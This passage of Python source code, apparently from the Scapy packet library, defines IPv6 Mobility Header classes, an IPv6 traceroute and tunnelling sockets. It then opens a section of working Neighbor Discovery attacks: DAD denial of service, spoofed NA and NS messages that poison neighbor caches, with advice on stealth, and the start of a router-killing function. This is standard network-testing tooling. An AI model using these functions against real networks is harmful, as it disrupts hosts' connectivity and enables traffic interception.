3195 

3196 

class _MobilityHeader(Packet):
    """
    Common base of the Mobility Header messages. It declares no field of
    its own; post_build() relies on the 'len' and 'cksum' fields of the
    subclasses.
    """

    name = 'Dummy IPv6 Mobility Header'
    overload_fields = {IPv6: {"nh": 135}}

    def post_build(self, p, pay):
        """
        Append the payload, then patch byte 1 (length) and bytes 4-5
        (checksum) of the result.

        When 'len' is unset, it is computed in units of 8 bytes, the
        first 8 bytes being excluded. When 'cksum' is unset, it is
        computed by in6_chksum() for next header value 135.
        """
        data = p + pay

        hdr_len = self.len
        if hdr_len is None:
            hdr_len = (len(data) - 8) // 8
        data = data[:1] + struct.pack("B", hdr_len) + data[2:]

        cksum = self.cksum
        if cksum is None:
            cksum = in6_chksum(135, self.underlayer, data)
        return data[:4] + struct.pack("!H", cksum) + data[6:]

3213 

3214 

class MIP6MH_Generic(_MobilityHeader):  # Mainly for decoding of unknown msg
    """
    Mobility Header whose message data is kept as an opaque string
    ('msg') of 8 * len - 6 bytes.
    """

    name = "IPv6 Mobility Header - Generic Message"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", None, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrLenField("msg", b"\x00" * 2,
                    length_from=lambda pkt: 8 * pkt.len - 6),
    ]

3224 

3225 

class MIP6MH_BRR(_MobilityHeader):
    """Mobility Header of type 0 (Binding Refresh Request)."""

    name = "IPv6 Mobility Header - Binding Refresh Request"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 0, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("res2", None),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], MIP6OptUnknown, 8,
                      length_from=lambda pkt: 8 * pkt.len),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the constant shared by BRR, BU and BA."""
        # Hack: BRR, BU and BA have the same hashret that returns the same
        #       value b"\x00\x08\x09" (concatenation of mhtypes). This is
        #       because we need match BA with BU and BU with BRR. --arno
        return b"\x00\x08\x09"

3244 

3245 

class MIP6MH_HoTI(_MobilityHeader):
    """Mobility Header of type 1 (Home Test Init) with an 8-byte cookie."""

    name = "IPv6 Mobility Header - Home Test Init"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 1, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        StrFixedLenField("reserved", b"\x00" * 2, 2),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], MIP6OptUnknown, 16,
                      length_from=lambda pkt: 8 * (pkt.len - 1)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the cookie as bytes."""
        return bytes_encode(self.cookie)

3262 

3263 

class MIP6MH_CoTI(MIP6MH_HoTI):
    """Same layout as MIP6MH_HoTI, with mhtype defaulting to 2."""

    mhtype = 2
    name = "IPv6 Mobility Header - Care-of Test Init"

    def hashret(self):
        """Return the cookie as bytes."""
        return bytes_encode(self.cookie)

3270 

3271 

class MIP6MH_HoT(_MobilityHeader):
    """
    Mobility Header of type 3 (Home Test), carrying an index, an 8-byte
    cookie and an 8-byte token.
    """

    name = "IPv6 Mobility Header - Home Test"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        ByteField("len", None),
        ByteEnumField("mhtype", 3, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        ShortField("index", None),
        StrFixedLenField("cookie", b"\x00" * 8, 8),
        StrFixedLenField("token", b"\x00" * 8, 8),
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda pkt: 8 * (pkt.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):
        """Return the cookie as bytes."""
        return bytes_encode(self.cookie)

    def answers(self, other):
        """Return 1 if other is a MIP6MH_HoTI with the same cookie."""
        if not isinstance(other, MIP6MH_HoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0

3295 

3296 

class MIP6MH_CoT(MIP6MH_HoT):
    """Same layout as MIP6MH_HoT, with mhtype defaulting to 4."""

    mhtype = 4
    name = "IPv6 Mobility Header - Care-of Test"

    def hashret(self):
        """Return the cookie as bytes."""
        return bytes_encode(self.cookie)

    def answers(self, other):
        """Return 1 if other is a MIP6MH_CoTI with the same cookie."""
        if not isinstance(other, MIP6MH_CoTI):
            return 0
        return 1 if self.cookie == other.cookie else 0

3309 

3310 

class LifetimeField(ShortField):
    """16-bit field displayed as a duration: one unit is 4 seconds."""

    def i2repr(self, pkt, x):
        """Return the value converted to seconds, e.g. "12 sec" for 3."""
        seconds = 4 * x
        return "%d sec" % seconds

3314 

3315 

class MIP6MH_BU(_MobilityHeader):
    """Mobility Header of type 5 (Binding Update)."""

    name = "IPv6 Mobility Header - Binding Update"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 5, mhtypes),
        ByteField("res", None),
        XShortField("cksum", None),
        XShortField("seq", None),  # TODO: ShortNonceField
        FlagsField("flags", "KHA", 7, "PRMKLHA"),
        XBitField("reserved", 0, 9),
        LifetimeField("mhtime", 3),  # unit == 4 seconds
        # autopad activated by default
        _PhantomAutoPadField("autopad", 1),
        _OptionsField("options", [], MIP6OptUnknown, 12,
                      length_from=lambda pkt: 8 * pkt.len - 4),
    ]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
        """Return the constant shared by BRR, BU and BA."""
        return b"\x00\x08\x09"

    def answers(self, other):
        """Return 1 if other is a MIP6MH_BRR, 0 otherwise."""
        return 1 if isinstance(other, MIP6MH_BRR) else 0

3339 

3340 

class MIP6MH_BA(_MobilityHeader):
    """Mobility Header of type 6 (Binding Acknowledgement)."""

    name = "IPv6 Mobility Header - Binding ACK"
    fields_desc = [ByteEnumField("nh", 59, ipv6nh),
                   ByteField("len", None),  # unit == 8 bytes (excluding the first 8 bytes)  # noqa: E501
                   ByteEnumField("mhtype", 6, mhtypes),
                   ByteField("res", None),
                   XShortField("cksum", None),
                   ByteEnumField("status", 0, bastatus),
                   FlagsField("flags", "K", 3, "PRK"),
                   XBitField("res2", None, 5),
                   XShortField("seq", None),  # TODO: ShortNonceField
                   XShortField("mhtime", 0),  # unit == 4 seconds
                   _PhantomAutoPadField("autopad", 1),  # autopad activated by default  # noqa: E501
                   _OptionsField("options", [], MIP6OptUnknown, 12,
                                 length_from=lambda pkt: 8 * pkt.len - 4)]
    overload_fields = {IPv6: {"nh": 135}}

    def hashret(self):  # Hack: see comment in MIP6MH_BRR.hashret()
        """Return the constant shared by BRR, BU and BA."""
        return b"\x00\x08\x09"

    def answers(self, other):
        """
        Return 1 if other is a Binding Update (mhtype 5) that requests an
        acknowledgement and carries the same sequence number as this
        Binding ACK (mhtype 6); 0 otherwise.
        """
        # The flags of MIP6MH_BU are declared as "PRMKLHA" on 7 bits, the
        # first name being the least significant bit: the Acknowledge
        # flag "A" is therefore 0x40. The previous test (0x1) was looking
        # at the "P" flag instead.
        if (isinstance(other, MIP6MH_BU) and
                other.mhtype == 5 and
                self.mhtype == 6 and
                other.flags & 0x40 and  # Ack request flag is set
                self.seq == other.seq):
            return 1
        return 0

3369 

3370 

# Binding Error status codes (used by MIP6MH_BE)
_bestatus = {
    1: 'Unknown binding for Home Address destination option',
    2: 'Unrecognized MH Type value',
}

3373 

3374# TODO: match Binding Error to its stimulus 

3375 

3376 

class MIP6MH_BE(_MobilityHeader):
    """Mobility Header of type 7 (Binding Error)."""

    name = "IPv6 Mobility Header - Binding Error"
    fields_desc = [
        ByteEnumField("nh", 59, ipv6nh),
        # unit == 8 bytes (excluding the first 8 bytes)
        ByteField("len", None),
        ByteEnumField("mhtype", 7, mhtypes),
        ByteField("res", 0),
        XShortField("cksum", None),
        ByteEnumField("status", 0, _bestatus),
        ByteField("reserved", 0),
        IP6Field("ha", "::"),
        _OptionsField("options", [], MIP6OptUnknown, 24,
                      length_from=lambda pkt: 8 * (pkt.len - 2)),
    ]
    overload_fields = {IPv6: {"nh": 135}}

3390 

3391 

# Mobility Header type -> class implementing that message
_mip6_mhtype2cls = {
    0: MIP6MH_BRR,
    1: MIP6MH_HoTI,
    2: MIP6MH_CoTI,
    3: MIP6MH_HoT,
    4: MIP6MH_CoT,
    5: MIP6MH_BU,
    6: MIP6MH_BA,
    7: MIP6MH_BE,
}

3400 

3401 

3402############################################################################# 

3403############################################################################# 

3404# Traceroute6 # 

3405############################################################################# 

3406############################################################################# 

3407 

class AS_resolver6(AS_resolver_riswhois):
    """AS resolver accepting IPv6 addresses (see _resolve_one())."""

    def _resolve_one(self, ip):
        """
        overloaded version to provide a Whois resolution on the
        embedded IPv4 address if the address is 6to4 or Teredo.
        Otherwise, the native IPv6 address is passed.

        Returns an (ip, asn, desc) tuple where ip is the address received
        as argument. When the AS number reported by the parent resolver
        is a string of the form "AS<number>", it is converted to an int;
        any other value is returned unchanged.
        """

        if in6_isaddr6to4(ip):  # for 6to4, use embedded @
            tmp = inet_pton(socket.AF_INET6, ip)
            addr = inet_ntop(socket.AF_INET, tmp[2:6])
        elif in6_isaddrTeredo(ip):  # for Teredo, use mapped address
            addr = teredoAddrExtractInfo(ip)[2]
        else:
            addr = ip

        _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr)

        # NOTE(review): the parent resolver presumably reports a
        # non-string value (e.g. None) when no AS is found - confirm.
        # Such a value is passed through instead of raising on
        # .startswith().
        if isinstance(asn, str) and asn.startswith("AS"):
            try:
                asn = int(asn[2:])
            except ValueError:
                # Not a plain number after the prefix: keep the string
                pass

        return ip, asn, desc

3433 

3434 

class TracerouteResult6(TracerouteResult):
    """IPv6 flavour of TracerouteResult."""

    __slots__ = []

    def show(self):
        """Display the results as a table (see make_table())."""

        def _cells(s, r):
            # One table entry per (sent, received) couple
            target = s.sprintf(
                "%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}"
                "{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"
            )  # TODO: ICMPv6 !
            answer = r.sprintf(
                "%-42s,IPv6.src% {TCP:%TCP.flags%}"
                "{ICMPv6DestUnreach:%ir,type%}"
                "{ICMPv6PacketTooBig:%ir,type%}"
                "{ICMPv6TimeExceeded:%ir,type%}"
                "{ICMPv6ParamProblem:%ir,type%}"
                "{ICMPv6EchoReply:%ir,type%}"
            )
            return target, s.hlim, answer

        return self.make_table(_cells)

    def get_trace(self):
        """
        Return a dict mapping each probed destination to a dict
        {hop limit: (source of the answer, flag)}. The flag is False when
        the answer contains one of the ICMPv6 error messages tested
        below. For each destination, hops located after the first
        flagged one are dropped.
        """
        icmp_errors = (ICMPv6TimeExceeded, ICMPv6DestUnreach,
                       ICMPv6PacketTooBig, ICMPv6ParamProblem)
        trace = {}

        for snd, rcv in self.res:
            if IPv6 not in snd:
                continue
            hops = trace.setdefault(snd[IPv6].dst, {})
            final = not any(err in rcv for err in icmp_errors)
            hops[snd[IPv6].hlim] = rcv[IPv6].src, final

        for hops in trace.values():
            try:
                first_final = min(hl for hl, info in hops.items() if info[1])
            except ValueError:
                # No final answer for that destination: keep everything
                continue
            # Collect the keys first: hops is modified while looping
            for hl in [hl for hl in hops if hl > first_final]:
                del hops[hl]

        return trace

    def graph(self, ASres=AS_resolver6(), **kargs):
        """Same as TracerouteResult.graph(), using AS_resolver6 by default."""
        TracerouteResult.graph(self, ASres=ASres, **kargs)

3476 

3477 

@conf.commands.register
def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(),
                l4=None, timeout=2, verbose=None, **kargs):
    """Instant TCP traceroute using IPv6
    traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None
    """
    if verbose is None:
        verbose = conf.verb

    if l4 is not None:
        # Caller-provided layer 4: no capture filter is set
        probes = IPv6(dst=target, hlim=(minttl, maxttl)) / l4
        a, b = sr(probes, timeout=timeout, verbose=verbose, **kargs)
    else:
        probes = (IPv6(dst=target, hlim=(minttl, maxttl)) /
                  TCP(seq=RandInt(), sport=sport, dport=dport))
        a, b = sr(probes, timeout=timeout, filter="icmp6 or tcp",
                  verbose=verbose, **kargs)

    a = TracerouteResult6(a.res)

    if verbose:
        a.show()

    return a, b

3500 

3501############################################################################# 

3502############################################################################# 

3503# Sockets # 

3504############################################################################# 

3505############################################################################# 

3506 

3507 

if not WINDOWS:
    from scapy.supersocket import L3RawSocket

    class L3RawSocket6(L3RawSocket):
        """L3RawSocket variant sending through an AF_INET6 raw socket."""

        def __init__(self, type=ETH_P_IPV6, filter=None, iface=None,
                     promisc=None, nofilter=0):
            # NOTE: if fragmentation is needed, it will be done by the
            #       kernel (RFC 2292)
            self.outs = socket.socket(
                socket.AF_INET6,
                socket.SOCK_RAW,
                socket.IPPROTO_RAW,
            )
            self.ins = socket.socket(
                socket.AF_PACKET,
                socket.SOCK_RAW,
                socket.htons(type),
            )
            self.iface = iface

3517 

3518 

def IPv6inIP(dst='203.178.135.36', src=None):
    """
    Configure the _IPv6inIP class with the given IPv4 endpoints and
    return it.

    If conf.L3socket already is _IPv6inIP, conf.L3socket is deleted;
    otherwise the current conf.L3socket is remembered in _IPv6inIP.cls.
    """
    _IPv6inIP.dst = dst
    _IPv6inIP.src = src
    if conf.L3socket == _IPv6inIP:
        del conf.L3socket
    else:
        _IPv6inIP.cls = conf.L3socket
    return _IPv6inIP

3527 

3528 

class _IPv6inIP(SuperSocket):
    """
    Socket wrapping another socket class (cls): sent packets are put
    inside an IP header whose proto is IPPROTO_IPV6, and the IPv6
    payload of matching received IP packets is returned.
    """

    dst = '127.0.0.1'
    src = None
    cls = None

    def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM,
                 proto=0, **args):
        SuperSocket.__init__(self, family, type, proto)
        # The wrapped socket does the actual work
        self.worker = self.cls(**args)

    def set(self, dst, src=None):
        """Change the IPv4 endpoints (stored on the class)."""
        _IPv6inIP.dst = dst
        _IPv6inIP.src = src

    def nonblock_recv(self):
        """Non blocking receive through the wrapped socket."""
        return self._recv(self.worker.nonblock_recv())

    def recv(self, x):
        """Receive through the wrapped socket."""
        return self._recv(self.worker.recv(x), x)

    def _recv(self, p, x=MTU):
        """
        Return the IPv6 payload of p when p is an IP packet coming from
        self.dst with proto IPPROTO_IPV6; return p unchanged otherwise.
        """
        # TODO: verify checksum
        is_tunneled = (
            p is not None and
            isinstance(p, IP) and
            p.src == self.dst and
            p.proto == socket.IPPROTO_IPV6 and
            isinstance(p.payload, IPv6)
        )
        if is_tunneled:
            return p.payload
        return p

    def send(self, x):
        """Send x inside an IP packet built from dst and src."""
        outer = IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6)
        return self.worker.send(outer / x)

3562 

3563 

3564############################################################################# 

3565############################################################################# 

3566# Neighbor Discovery Protocol Attacks # 

3567############################################################################# 

3568############################################################################# 

3569 

def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None,
                        tgt_filter=None, reply_mac=None):
    """
    Internal generic helper accepting a specific callback as first argument,
    for NS or NA reply. See the two specific functions below.

    reply_callback is called as reply_callback(req, reply_mac, iface) for
    each sniffed packet accepted by the checks below. tgt_filter may be
    given either as a printable IPv6 address or as bytes, which are used
    as is.
    """

    # The target of a received NS is compared in packed form: convert a
    # printable filter once here, otherwise the comparison below could
    # never succeed. Bytes are left untouched (previous behavior).
    if tgt_filter and not isinstance(tgt_filter, bytes):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a request
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        # Get and compare the MAC address
        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must be the unspecified address
        if req[IPv6].src != "::":
            return 0

        # Check destination is the link-local solicited-node multicast
        # address associated with target address in received NS
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0
        received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst)
        expected_snma = in6_getnsma(tgt)
        if received_snma != expected_snma:
            return 0

        return 1

    if not iface:
        iface = conf.iface

    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, iface),
          iface=iface)

3620 

3621 

def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NS described in section 4.1.3 of RFC
    3756. Incoming NS messages sent from the unspecified address are
    listened for, and each of them is answered with a NS for the same
    target address. The peer is thus led to believe that another node is
    also performing DAD for that address.

    By default, the fake NS sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the unspecified address (::).
     - as IPv6 destination address: the link-local solicited-node multicast
       address derived from the target address in received NS.
     - the mac address of the interface as source (or reply_mac, see below).
     - the multicast mac address derived from the solicited node multicast
       address used as IPv6 destination address.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.
    """

    def ns_reply_callback(req, reply_mac, iface):
        """
        Answer the NS found in req with a similar NS
        """

        # Values taken from the request
        mac = req[Ether].src
        dst = req[IPv6].dst
        tgt = req[ICMPv6ND_NS].tgt

        # Build the reply layer by layer, then send it
        rep = Ether(src=reply_mac)
        rep = rep / IPv6(src="::", dst=dst)
        rep = rep / ICMPv6ND_NS(tgt=tgt)
        sendp(rep, iface=iface, verbose=0)

        print("Reply NS for target address %s (received from %s)" % (tgt, mac))

    _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)

3676 

3677 

def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None,
                              reply_mac=None):
    """
    Perform the DAD DoS attack using NA described in section 4.1.3 of RFC
    3756. Incoming NS messages *sent from the unspecified address* are
    answered with a NA for the solicited target address, leading the peer
    to believe that another node already uses that address.

    By default, the fake NA sent to create the DoS uses:
     - as target address: the target address found in received NS.
     - as IPv6 source address: the target address found in received NS.
     - as IPv6 destination address: the destination address of the
       received NS, i.e. the link-local solicited-node multicast address
       derived from the target address of a DAD NS.
     - as source mac address: the mac address of the interface (or
       reply_mac, see below).
     - as destination mac address: the multicast mac address derived from
       the solicited node multicast address used as IPv6 destination
       address.
     - a Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled
       with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
         DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.
    """

    def na_reply_callback(req, reply_mac, iface):
        """
        Answer the NS carried by req with a NA claiming its target address
        """

        sender_mac = req[Ether].src
        target = req[ICMPv6ND_NS].tgt

        # The NA is sourced from the solicited address itself and reuses
        # the IPv6 destination of the NS. S=0 since the NS comes from the
        # unspecified address, O=1 to override any cached entry.
        answer = (
            Ether(src=reply_mac) /
            IPv6(src=target, dst=req[IPv6].dst) /
            ICMPv6ND_NA(tgt=target, S=0, R=0, O=1) /
            ICMPv6NDOptDstLLAddr(lladdr=reply_mac)
        )
        sendp(answer, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" %
              (target, sender_mac))

    # Sniffing and filtering are handed over to the shared DAD DoS helper,
    # which receives the callback along with the user-provided filters.
    _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter,
                        tgt_filter, reply_mac)

3737 

3738 

def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None,
                           reply_mac=None, router=False):
    """
    The main purpose of this function is to send fake Neighbor Advertisement
    messages to a victim. As the emission of unsolicited Neighbor Advertisement
    is pretty pointless (from an attacker standpoint) because it will not
    lead to a modification of a victim's neighbor cache, the function send
    advertisements in response to received NS (NS sent as part of the DAD,
    i.e. with an unspecified address as source, are not considered).

    By default, the fake NA sent to create the DoS uses:
     - as target address the target address found in received NS.
     - as IPv6 source address: the target address
     - as IPv6 destination address: the source IPv6 address of received NS
       message.
     - the mac address of the interface as source (or reply_mac, see below).
     - the source mac address of the received NS as destination macs address
       of the emitted NA.
     - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr)
       filled with the mac address used as source of the NA.

    Following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
          DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only NS messages received from this source will trigger replies.
         This allows limiting the effects of the DoS to a single target by
         filtering on its mac address. The default value is None: the DoS
         is not limited to a specific mac address.

    tgt_filter: Same as previous but for a specific target IPv6 address for
         received NS. If the target address in the NS message (not the IPv6
         destination address) matches that address, then a fake reply will
         be sent, i.e. the emitter will be a target of the DoS. The address
         can be given in printable form (e.g. "2001:db8::1"); a value that
         is not a string is used as is and is expected to be the packed
         (network) form of the address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface. This
         address will also be used in the Target Link-Layer Address option.

    router: by the default (False) the 'R' flag in the NA used for the reply
         is not set. If the parameter is set to True, the 'R' flag in the
         NA is set, advertising us as a router.

    Please, keep the following in mind when using the function: for obvious
    reasons (kernel space vs. Python speed), when the target of the address
    resolution is on the link, the sender of the NS receives 2 NA messages
    in a row, the valid one and our fake one. The second one will overwrite
    the information provided by the first one, i.e. the natural latency of
    Scapy helps here.

    In practice, on a common Ethernet link, the emission of the NA from the
    genuine target (kernel stack) usually occurs in the same millisecond as
    the receipt of the NS. The NA generated by Scapy6 will usually come after
    something 20+ ms. On a usual testbed for instance, this difference is
    sufficient to have the first data packet sent from the victim to the
    destination before it even receives our fake NA.
    """

    def is_request(req, mac_src_filter, tgt_filter):
        """
        Check if packet req is a NS we should answer.

        Returns 1 when req is a NS matching the filters, 0 otherwise.
        tgt_filter, when set, must be in packed form.
        """

        # Those simple checks are based on Section 5.4.2 of RFC 4862
        if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        # Source must NOT be the unspecified address
        if req[IPv6].src == "::":
            return 0

        # Addresses are compared in packed form, which is insensitive to
        # the various printable representations of a same address.
        tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt)
        if tgt_filter and tgt != tgt_filter:
            return 0

        dst = req[IPv6].dst
        if in6_isllsnmaddr(dst):  # Address is Link Layer Solicited Node mcast.

            # If this is a real address resolution NS, then the destination
            # address of the packet is the link-local solicited node multicast
            # address associated with the target of the NS.
            # Otherwise, the NS is a NUD related one, i.e. the peer is
            # unicasting the NS to check the target is still alive (L2
            # information is still in its cache and it is verified)
            received_snma = inet_pton(socket.AF_INET6, dst)
            expected_snma = in6_getnsma(tgt)
            if received_snma != expected_snma:
                print("solicited node multicast @ does not match target @!")
                return 0

        return 1

    def reply_callback(req, reply_mac, router, iface):
        """
        Callback that reply to a NS with a spoofed NA
        """

        # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and
        # send it back.
        mac = req[Ether].src
        pkt = req[IPv6]
        src = pkt.src
        tgt = req[ICMPv6ND_NS].tgt
        rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src)
        # Use the target field from the NS
        rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1)  # noqa: E741

        # "If the solicitation IP Destination Address is not a multicast
        # address, the Target Link-Layer Address option MAY be omitted"
        # Given our purpose, we always include it.
        rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac)

        sendp(rep, iface=iface, verbose=0)

        print("Reply NA for target address %s (received from %s)" % (tgt, mac))

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    router = 1 if router else 0  # Value of the R flags in NA

    # is_request() compares the NS target in packed form: a filter provided
    # in printable form would never match, hence the one-time conversion.
    # Values that are not strings are assumed to be packed already.
    if tgt_filter and isinstance(tgt_filter, str):
        tgt_filter = inet_pton(socket.AF_INET6, tgt_filter)

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter),
          prn=lambda x: reply_callback(x, reply_mac, router, iface),
          iface=iface)

3875 

3876 

def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1",
                           dst=None, src_mac=None, dst_mac=None, loop=True,
                           inter=1, iface=None):
    """
    Send fake Neighbor Solicitation messages to a victim, in order to either
    create a new entry in its neighbor cache or update an existing one. In
    section 7.2.3 of RFC 4861, it is stated that a node SHOULD create the
    entry or update an existing one (if it is not currently performing DAD
    for the target of the NS). The entry's reachability state is set to
    STALE.

    The two main parameters of the function are the source link-layer address
    (carried by the Source Link-Layer Address option in the NS) and the
    source address of the packet.

    Unlike some other NDP_Attack_* function, this one is not based on a
    stimulus/response model. When called, it sends the same NS packet in loop
    every second (the default).

    Following arguments can be used to change the format of the packets:

    src_lladdr: the MAC address used in the Source Link-Layer Address option
         included in the NS packet. This is the address that the peer should
         associate in its neighbor cache with the IPv6 source address of the
         packet. If None is provided, the mac address of the interface is
         used.

    src: the IPv6 address used as source of the packet. If None is provided,
         an address associated with the emitting interface will be used
         (based on the destination address of the packet).

    target: the target address of the NS packet. If no value is provided,
         a dummy address (2001:db8::1) is used. The value of the target
         has a direct impact on the destination address of the packet if it
         is not overridden. By default, the solicited-node multicast address
         associated with the target is used as destination address of the
         packet. Consider specifying a specific destination address if you
         intend to use a target address different than the one of the victim.

    dst: The destination address of the NS. By default, the solicited node
         multicast address associated with the target address (see previous
         parameter) is used if no specific value is provided. The victim
         is not expected to check the destination address of the packet,
         so using a multicast address like ff02::1 should work if you want
         the attack to target all hosts on the link. On the contrary, if
         you want to be more stealth, you should provide the target address
         for this parameter in order for the packet to be sent only to the
         victim.

    src_mac: the MAC address used as source of the packet. By default, this
         is the address of the interface. If you want to be more stealth,
         feel free to use something else. Note that this address is not the
         one that the victim will use to populate its neighbor cache.

    dst_mac: The MAC address used as destination address of the packet. If
         the IPv6 destination address is multicast (all-nodes, solicited
         node, ...), it will be computed. If the destination address is
         unicast, a neighbor solicitation will be performed to get the
         associated address. If you want the attack to be stealth, you
         can provide the MAC address using this parameter.

    loop: By default, this parameter is True, indicating that NS packets
         will be sent in loop, separated by 'inter' seconds (see below).
         When set to False, a single packet is sent.

    inter: When loop parameter is True (the default), this parameter provides
         the interval in seconds used for sending NS packets.

    iface: to force the sending interface.
    """

    iface = iface or conf.iface

    # Address advertised in the Source Link-Layer Address option: the
    # provided one or, failing that, the MAC address of the interface.
    src_lladdr = src_lladdr or get_if_hwaddr(iface)

    # Only the addresses explicitly provided are forced on the layers
    l2_fields = {name: addr
                 for name, addr in (("src", src_mac), ("dst", dst_mac))
                 if addr}

    l3_fields = {"src": src} if src else {}
    if dst:
        l3_fields["dst"] = dst
    else:
        # No destination given: fall back on the solicited-node multicast
        # address associated with the target address.
        packed_target = inet_pton(socket.AF_INET6, target)
        l3_fields["dst"] = inet_ntop(socket.AF_INET6,
                                     in6_getnsma(packed_target))

    ns = (
        Ether(**l2_fields) /
        IPv6(**l3_fields) /
        ICMPv6ND_NS(tgt=target) /
        ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr)
    )

    sendp(ns, inter=inter, loop=loop, iface=iface, verbose=0)

3982 

3983 

def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
                                   ip_src_filter=None, reply_mac=None,
                                   tgt_mac=None):
    """
    Monitor incoming RA messages sent by default routers (RA with a
    non-zero Router Lifetime value) and invalidate them by immediately
    replying with fake RA messages advertising a zero Router Lifetime value.

    The result on receivers is that the router is immediately invalidated,
    i.e. the associated entry is discarded from the default router list
    and destination cache is updated to reflect the change.

    By default, the function considers all RA messages with a non-zero
    Router Lifetime value but provides configuration knobs to allow
    filtering RA sent by specific routers (Ethernet source address).
    With regard to emission, the multicast all-nodes address is used
    by default but a specific target can be used, in order for the DoS to
    apply only to a specific host.

